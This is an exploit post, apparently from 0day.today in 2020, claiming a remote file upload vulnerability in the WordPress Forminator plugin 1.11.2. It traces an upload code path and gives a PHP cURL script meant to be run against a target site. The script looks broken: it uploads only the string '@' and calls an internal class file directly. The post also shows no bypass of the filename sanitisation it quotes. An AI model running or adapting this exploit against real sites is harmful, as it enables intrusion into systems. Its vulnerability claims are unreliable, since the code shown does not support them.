Share
[-] Title  : word press plugin forminator 1.11.2 - RFU
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/forminator/
[-] Category : Webapps
==============================================================================================
Vulnerable Page:
forminator/library/abstracts/abstract-class-front-action.php
==============================================================================================
Vulnerable Source:
    235: move_uploaded_file
move_uploaded_file($_FILES[$field_name]['tmp_name'], $file_path))
        229: $file_path = $upload_dir['basedir'] . '/' . $filename;  //
if($wp_filesystem->is_writable($upload_dir)) else ,
            198: $upload_dir = wp_upload_dir();
            200: $filename = basename($unique_file_name);
                199: $unique_file_name =
wp_unique_filename($upload_dir['path'], $file_name);
                    198: $upload_dir = wp_upload_dir();
                    169: $file_name =
sanitize_file_name($_FILES[$field_name]['name']);
        226: $file_path = $upload_dir['path'] . '/' . $filename;  //
if($wp_filesystem->is_writable($upload_dir)),
            198: $upload_dir = wp_upload_dir();
            200: $filename = basename($unique_file_name);
                199: $unique_file_name =
wp_unique_filename($upload_dir['path'], $file_name);
                    198: $upload_dir = wp_upload_dir();
                    169: $file_name =
sanitize_file_name($_FILES[$field_name]['name']);

        requires:
            167: if(isset($_FILES[$field_name]))
            168: if(isset($_FILES[$field_name]['name']) &&
!empty($_FILES[$field_name]['name']))
            166:
            โ‡“ function handle_file_upload($field_name)
===============================================================================================
Exploit :
<?php
$target = $argv[1];
$postData = array();
$postData[ 'file' ] = "@";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://
$target/abstract-class-front-action.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
===============================================================================================

#  0day.today [2020-02-21]  #